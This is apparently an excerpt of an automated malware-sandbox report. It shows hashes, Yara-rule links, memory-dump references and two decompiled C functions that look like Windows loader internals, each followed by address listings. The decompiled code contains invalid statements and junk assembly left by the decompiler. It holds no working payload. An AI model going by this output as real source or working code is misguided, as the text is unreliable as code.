Opcode ID: 15a67e7462e31c570b48dcc5e3dbf995d45134f2a0dbcecc7ad553b840367b40
Instruction ID: 134e097f3e81cf8d61e43338394327dfd29b6589831a3b782b9de7dc1f8e028c
Opcode Fuzzy Hash: 15a67e7462e31c570b48dcc5e3dbf995d45134f2a0dbcecc7ad553b840367b40
Instruction Fuzzy Hash: FDC120759083808FD355CF28C580A5AFBE1BF88708F184A6EF9998B352DB75E845CF42

Uniqueness

Uniqueness Score: -1.00%

Function 02AB03E2, Relevance: .3, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E02AB03E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x2b7d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E02AB0548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E02ACB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E02A9B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x2b77c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E02AA7D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E02AA7D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E02B07016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E02AC9830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E02B069A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x2b77c04 != 0) {
						_t118 = _v12;
						_t120 = E02B0A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x2b77bd8;
						if( *0x2b77bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E02AC95D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E02AC99A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E02B03540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E02A8B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E02ACAAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x2b78474 - 3;
										if( *0x2b78474 != 3) {
											 *0x2b779dc =  *0x2b779dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E02AA7D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E02AA7D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E02B07016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x2b78708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x2b77b00; // 0x0
							asm("ror esi, cl");
							 *0x2b7b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E02AC95D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E02A97F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}

0x02ab03f1
0x02ab03f7
0x02ab03f9
0x02ab03fb
0x02ab03fd
0x02ab0400
0x02ab040a
0x02af4c7a
0x02ab0537
0x02ab0547
0x02ab0410
0x02ab0410
0x02ab0414
0x02ab0417
0x02ab041a
0x02ab0421
0x02ab0424
0x02ab042b
0x02ab043b
0x02ab043e
0x02ab043f
0x02ab043f
0x02ab0446
0x02ab0449
0x02ab044c
0x02ab044f
0x02ab0459
0x02af4c8d
0x02ab045f
0x02ab045f
0x02ab045f
0x02ab0467
0x02af4c97
0x02af4c9d
0x02af4ca4
0x02af4caa
0x02af4caf
0x02af4cb1
0x02af4cc3
0x02af4cb3
0x02af4cbc
0x02af4cbc
0x02af4cc8
0x02af4ccb
0x02af4cd7
0x02af4cda
0x02af4cdf
0x02af4cdf
0x02af4ccb
0x02af4ca4
0x02ab046d
0x02ab046f
0x02ab046f
0x02ab0471
0x02ab0476
0x02ab047a
0x02ab047b
0x02ab0483
0x02ab0489
0x02ab048d
0x00000000
0x00000000
0x02af4ce9
0x02af4cef
0x02af4d22
0x02af4d22
0x00000000
0x02af4d22
0x02af4cf1
0x02af4cf7
0x00000000
0x00000000
0x02af4cf9
0x02af4cff
0x00000000
0x00000000
0x02af4d05
0x02af4d07
0x00000000
0x00000000
0x02af4d0d
0x02af4d0f
0x02af4d14
0x02af4d16
0x00000000
0x00000000
0x02af4d1c
0x02af4d1c
0x02ab0499
0x02ab0535
0x02ab0535
0x00000000
0x02ab0535
0x02ab04a6
0x02af4d2c
0x02af4d37
0x02af4d39
0x02af4d3b
0x00000000
0x00000000
0x02af4d41
0x02af4d48
0x02ab0527
0x02ab052b
0x02ab052d
0x02ab0530
0x02ab0530
0x00000000
0x02ab052b
0x02af4d4e
0x02ab04ac
0x02ab04ac
0x02ab04af
0x02ab04b2
0x02ab04b7
0x02ab04b9
0x02ab04bb
0x02ab04bd
0x02ab04bf
0x02ab04c5
0x02ab04c9
0x02af4d53
0x02af4d59
0x02af4db9
0x02af4dba
0x02af4dbf
0x02af4dc2
0x02af4dc4
0x02af4dc7
0x02af4dce
0x00000000
0x02af4dce
0x02af4d5b
0x02af4d61
0x00000000
0x00000000
0x02af4d63
0x02af4d69
0x00000000
0x00000000
0x02af4d6b
0x02af4d6e
0x02af4d74
0x02af4d76
0x02af4d7c
0x02af4d7e
0x02af4d84
0x02af4d89
0x02af4d8c
0x02af4d8d
0x02af4d92
0x02af4d95
0x02af4d96
0x02af4d98
0x02af4d9a
0x02af4d9f
0x02af4da4
0x02af4da6
0x02af4da8
0x02af4daf
0x02af4db1
0x02af4db1
0x02af4daf
0x02af4da6
0x02af4d84
0x02af4d7c
0x00000000
0x02af4d74
0x02ab04d6
0x02af4de1
0x02ab04dc
0x02ab04dc
0x02ab04dc
0x02ab04e4
0x02af4deb
0x02af4df1
0x02af4df8
0x02af4dfe
0x02af4e03
0x02af4e05
0x02af4e17
0x02af4e07
0x02af4e10
0x02af4e10
0x02af4e1c
0x02af4e1f
0x02af4e35
0x02af4e35
0x02af4e1f
0x02af4df8
0x02ab04f1
0x02ab04fa
0x02af4e3f
0x02af4e47
0x02af4e5b
0x02af4e61
0x02af4e67
0x02af4e69
0x02af4e71
0x02af4e73
0x02ab0500
0x02ab0500
0x02ab0500
0x02ab04fa
0x02ab0508
0x02ab051d
0x02ab051d
0x02ab051f
0x02ab0524
0x00000000
0x02ab0524
0x02ab0515
0x02ab0517
0x02af4e7a
0x02af4e7c
0x00000000
0x00000000
0x02af4e85
0x00000000
0x02af4e85
0x00000000
0x02ab0517

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8aae280474010308aa183893b3b4cb9fac0573c142969e1c32c77a73bb8dc17f
Instruction ID: 0a748853a0b83e4a3d908f9d30289351559fac2739350081d08b161932073c9a
Opcode Fuzzy Hash: 8aae280474010308aa183893b3b4cb9fac0573c142969e1c32c77a73bb8dc17f
Instruction Fuzzy Hash: DD910831E403549FDB229BA8C884BAFBBA9AF04758F054265FB11A72D1DF789D40CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02AB2581, Relevance: .2, Instructions: 231
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E02AB2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, void* _a35, void* _a1530200743, void* _a1546912423) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t236;
				signed int _t240;
				signed int _t248;
				signed int _t250;
				intOrPtr _t252;
				signed int _t255;
				signed int _t262;
				signed int _t265;
				signed int _t273;
				intOrPtr _t279;
				signed int _t281;
				signed int _t283;
				void* _t284;
				void* _t288;
				signed int _t289;
				unsigned int _t292;
				signed int _t296;
				void* _t297;
				signed int _t300;
				signed int _t304;
				intOrPtr _t319;
				signed int _t328;
				signed int _t330;
				signed int _t331;
				signed int _t335;
				signed int _t336;
				signed int _t338;
				signed int _t340;
				signed int _t342;
				void* _t343;

				_t340 = _t342;
				_t343 = _t342 - 0x4c;
				_v8 =  *0x2b7d360 ^ _t340;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t335 = 0x2b7b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t292 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t279 = 0x48;
				_t314 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t328 = 0;
				_v37 = (_v24 >> 0x0000001c & 0x00000003) == 1;
				if(_v48 <= 0) {
					L16:
					_t45 = _t279 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t336 = 0xc0000106;
						goto L32;
					} else {
						_t335 = L02AA4620(_t292,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t279);
						_v52 = _t335;
						__eflags = _t335;
						if(_t335 == 0) {
							_t336 = 0xc0000017;
							goto L32;
						} else {
							 *(_t335 + 0x44) =  *(_t335 + 0x44) & 0x00000000;
							_t50 = _t335 + 0x48; // 0x48
							_t330 = _t50;
							_t314 = _v32;
							 *((intOrPtr*)(_t335 + 0x3c)) = _t279;
							_t281 = 0;
							 *((short*)(_t335 + 0x30)) = _v48;
							__eflags = _t314;
							if(_t314 != 0) {
								 *(_t335 + 0x18) = _t330;
								__eflags = _t314 - 0x2b78478;
								 *_t335 = ((0 | _t314 == 0x02b78478) - 0x00000001 & 0xfffffffb) + 7;
								E02ACF3E0(_t330,  *((intOrPtr*)(_t314 + 4)),  *_t314 & 0x0000ffff);
								_t314 = _v32;
								_t343 = _t343 + 0xc;
								_t281 = 1;
								__eflags = _a8;
								_t330 = _t330 + (( *_t314 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t273 = E02B139F2(_t330);
									_t314 = _v32;
									_t330 = _t273;
								}
							}
							_t296 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t336 = _v68;
								__eflags = 0;
								 *((short*)(_t330 - 2)) = 0;
								goto L32;
							} else {
								_t283 = _t335 + _t281 * 4;
								_v56 = _t283;
								do {
									__eflags = _t314;
									if(_t314 != 0) {
										_t236 =  *(_v60 + _t296 * 4);
										__eflags = _t236;
										if(_t236 == 0) {
											goto L30;
										} else {
											__eflags = _t236 == 5;
											if(_t236 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t283 =  *(_v60 + _t296 * 4);
										 *(_t283 + 0x18) = _t330;
										_t240 =  *(_v60 + _t296 * 4);
										__eflags = _t240 - 8;
										if(_t240 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t240 * 4 +  &M02AB2959))) {
												case 0:
													__ax =  *0x2b78488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E02ACF3E0(__edi,  *0x2b7848c, __ax & 0x0000ffff);
														__eax =  *0x2b78488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E02ACF3E0(_t330, _v80, _v64);
													_t268 = _v64;
													goto L26;
												case 2:
													 *0x2b78480 & 0x0000ffff = E02ACF3E0(__edi,  *0x2b78484,  *0x2b78480 & 0x0000ffff);
													__eax =  *0x2b78480 & 0x0000ffff;
													__eax = ( *0x2b78480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E02ACF3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E02ACF3E0(_t330, _v76, _v36);
														_t268 = _v36;
													}
													L26:
													_t343 = _t343 + 0xc;
													_t330 = _t330 + (_t268 >> 1) * 2 + 2;
													__eflags = _t330;
													L27:
													_push(0x3b);
													_pop(_t270);
													 *((short*)(_t330 - 2)) = _t270;
													goto L28;
												case 6:
													__ebx =  *0x2b7575c;
													__eflags = __ebx - 0x2b7575c;
													if(__ebx != 0x2b7575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E02ACF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x2b7575c;
														} while (__ebx != 0x2b7575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x2b78478 & 0x0000ffff = E02ACF3E0(__edi,  *0x2b7847c,  *0x2b78478 & 0x0000ffff);
													__eax =  *0x2b78478 & 0x0000ffff;
													__eax = ( *0x2b78478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E02B139F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x2b76e58 & 0x0000ffff = E02ACF3E0(__edi,  *0x2b76e5c,  *0x2b76e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x2b76e58 & 0x0000ffff;
													__eax = ( *0x2b76e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t296 = _v16;
													_t314 = _v32;
													L29:
													_t283 = _t283 + 4;
													__eflags = _t283;
													_v56 = _t283;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t296 = _t296 + 1;
									_v16 = _t296;
									__eflags = _t296 - _v48;
								} while (_t296 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t240 =  *(_v60 + _t328 * 4);
						if(_t240 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t240 * 4 +  &M02AB2935))) {
							case 0:
								__ax =  *0x2b78488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t314 =  &_v64;
								_v80 = L02AB2E3E(0,  &_v64);
								_t279 = _t279 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x2b78480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x2b78480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E02A9EEF0(0x2b779a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E02A9EB70(__ecx, 0x2b779a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t214 = _v72;
											__eflags = _t214;
											if(_t214 != 0) {
												L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t214);
											}
											_t215 = _v52;
											__eflags = _t215;
											if(_t215 != 0) {
												__eflags = _t336;
												if(_t336 < 0) {
													L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t215);
													_t215 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t292 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x2b77b9c;
									_v44 + _v44 =  *[fs:0x30];
									__ecx =  *0x2b77b9c + 0x180000;
									__eax = L02AA4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E02A9EB70(__ecx, 0x2b779a0);
										__eax = _v52;
										L36:
										_pop(_t329);
										_pop(_t337);
										__eflags = _v8 ^ _t340;
										_pop(_t280);
										return E02ACB640(_t215, _t280, _v8 ^ _t340, _t314, _t329, _t337);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t275 = _v56;
								if(_v56 != 0) {
									_t314 =  &_v36;
									_t277 = L02AB2E3E(_t275,  &_v36);
									_t292 = _v36;
									_v76 = _t277;
								}
								if(_t292 == 0) {
									goto L44;
								} else {
									_t279 = _t279 + 2 + _t292;
								}
								goto L14;
							case 6:
								__eax =  *0x2b75764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x2b78478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x2b78478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x2b76e58 & 0x0000ffff;
								__eax = ( *0x2b76e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t328 = _t328 + 1;
								if(_t328 >= _v48) {
									goto L16;
								} else {
									_t314 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t297 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					asm("stosd");
					asm("stosd");
					asm("daa");
					asm("stosd");
					asm("es stosd");
					asm("stosd");
					_pop(_t284);
					asm("scasd");
					asm("scasd");
					 *((intOrPtr*)(_t284 - 0x54d77ffe)) =  *((intOrPtr*)(_t284 - 0x54d77ffe)) - _t340;
					asm("daa");
					asm("stosd");
					 *((intOrPtr*)(_t284 +  *_t335 - 0x54d7b1fe)) =  *((intOrPtr*)(_t284 +  *_t335 - 0x54d7b1fe)) - _t297 +  *_t335;
					asm("stosd");
					_pop(_t288);
					asm("scasd");
					asm("scasd");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x2b5ff00);
					E02ADD08C(_t288, _t330, _t335);
					_v44 =  *[fs:0x18];
					_t331 = 0;
					 *_a24 = 0;
					_t289 = _a12;
					__eflags = _t289;
					if(_t289 == 0) {
						_t248 = 0xc0000100;
					} else {
						_v8 = 0;
						_t338 = 0xc0000100;
						_v52 = 0xc0000100;
						_t250 = 4;
						while(1) {
							_v40 = _t250;
							__eflags = _t250;
							if(_t250 == 0) {
								break;
							}
							_t304 = _t250 * 0xc;
							_v48 = _t304;
							__eflags = _t289 -  *((intOrPtr*)(_t304 + 0x2a61664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t265 = E02ACE5C0(_a8,  *((intOrPtr*)(_t304 + 0x2a61668)), _t289);
									_t343 = _t343 + 0xc;
									__eflags = _t265;
									if(__eflags == 0) {
										_t338 = E02B051BE(_t289,  *((intOrPtr*)(_v48 + 0x2a6166c)), _a16, _t331, _t338, __eflags, _a20, _a24);
										_v52 = _t338;
										break;
									} else {
										_t250 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t250 = _t250 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t338;
						__eflags = _t338;
						if(_t338 < 0) {
							__eflags = _t338 - 0xc0000100;
							if(_t338 == 0xc0000100) {
								_t300 = _a4;
								__eflags = _t300;
								if(_t300 != 0) {
									_v36 = _t300;
									__eflags =  *_t300 - _t331;
									if( *_t300 == _t331) {
										_t338 = 0xc0000100;
										goto L76;
									} else {
										_t319 =  *((intOrPtr*)(_v44 + 0x30));
										_t252 =  *((intOrPtr*)(_t319 + 0x10));
										__eflags =  *((intOrPtr*)(_t252 + 0x48)) - _t300;
										if( *((intOrPtr*)(_t252 + 0x48)) == _t300) {
											__eflags =  *(_t319 + 0x1c);
											if( *(_t319 + 0x1c) == 0) {
												L106:
												_t338 = E02AB2AE4( &_v36, _a8, _t289, _a16, _a20, _a24);
												_v32 = _t338;
												__eflags = _t338 - 0xc0000100;
												if(_t338 != 0xc0000100) {
													goto L69;
												} else {
													_t331 = 1;
													_t300 = _v36;
													goto L75;
												}
											} else {
												_t255 = E02A96600( *(_t319 + 0x1c));
												__eflags = _t255;
												if(_t255 != 0) {
													goto L106;
												} else {
													_t300 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t338 = E02AB2C50(_t300, _a8, _t289, _a16, _a20, _a24, _t331);
											L76:
											_v32 = _t338;
											goto L69;
										}
									}
									goto L108;
								} else {
									E02A9EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t338 = _a24;
									_t262 = E02AB2AE4( &_v36, _a8, _t289, _a16, _a20, _t338);
									_v32 = _t262;
									__eflags = _t262 - 0xc0000100;
									if(_t262 == 0xc0000100) {
										_v32 = E02AB2C50(_v36, _a8, _t289, _a16, _a20, _t338, 1);
									}
									_v8 = _t331;
									E02AB2ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t248 = _t338;
					}
					L70:
					return E02ADD0D1(_t248);
				}
				L108:
			}

0x02ab2584
0x02ab2586
0x02ab2590
0x02ab2596
0x02ab2597
0x02ab2598
0x02ab2599
0x02ab259e
0x02ab25a4
0x02ab25a9
0x02ab25ac
0x02ab25ae
0x02ab25b1
0x02ab25b2
0x02ab25b5
0x02ab25b8
0x02ab25bb
0x02ab25bc
0x02ab25bf
0x02ab25c2
0x02ab25c5
0x02ab25c6
0x02ab25cb
0x02ab25ce
0x02ab25d8
0x02ab25dd
0x02ab25de
0x02ab25e1
0x02ab25e3
0x02ab25e9
0x02ab26da
0x02ab26da
0x02ab26dd
0x02ab26e2
0x02af5b56
0x00000000
0x02ab26e8
0x02ab26f9
0x02ab26fb
0x02ab26fe
0x02ab2700
0x02af5b60
0x00000000
0x02ab2706
0x02ab2706
0x02ab270a
0x02ab270a
0x02ab270d
0x02ab2713
0x02ab2716
0x02ab2718
0x02ab271c
0x02ab271e
0x02af5b6c
0x02af5b6f
0x02af5b7f
0x02af5b89
0x02af5b8e
0x02af5b93
0x02af5b96
0x02af5b9c
0x02af5ba0
0x02af5ba3
0x02af5bab
0x02af5bb0
0x02af5bb3
0x02af5bb3
0x02af5ba3
0x02ab2724
0x02ab2726
0x02ab2729
0x02ab272c
0x02ab279d
0x02ab279d
0x02ab27a0
0x02ab27a2
0x00000000
0x02ab272e
0x02ab272e
0x02ab2731
0x02ab2734
0x02ab2734
0x02ab2736
0x02af5bc1
0x02af5bc1
0x02af5bc4
0x00000000
0x02af5bca
0x02af5bca
0x02af5bcd
0x00000000
0x02af5bd3
0x00000000
0x02af5bd3
0x02af5bcd
0x02ab273c
0x02ab273c
0x02ab2742
0x02ab2747
0x02ab274a
0x02ab274d
0x02ab2750
0x00000000
0x02ab2756
0x02ab2756
0x00000000
0x02ab2902
0x02ab2908
0x02ab290b
0x00000000
0x02ab2911
0x02ab291c
0x02ab2921
0x00000000
0x02ab2921
0x00000000
0x00000000
0x02ab2880
0x02ab2887
0x02ab288c
0x00000000
0x00000000
0x02ab2805
0x02ab280a
0x02ab2814
0x02ab2816
0x00000000
0x00000000
0x02ab281e
0x02ab2821
0x02ab2823
0x00000000
0x02ab2829
0x02ab2829
0x02ab2831
0x02ab283c
0x02ab283e
0x00000000
0x02ab283e
0x00000000
0x00000000
0x02ab284e
0x02ab2850
0x02ab2851
0x02ab2854
0x02ab2857
0x02ab285a
0x02ab285c
0x02ab285d
0x00000000
0x00000000
0x02ab275d
0x02ab2761
0x00000000
0x02ab2767
0x02ab276e
0x02ab2773
0x02ab2773
0x02ab2776
0x02ab2778
0x02ab277e
0x02ab277e
0x02ab2781
0x02ab2781
0x02ab2783
0x02ab2784
0x00000000
0x00000000
0x02af5bd8
0x02af5bde
0x02af5be4
0x02af5be6
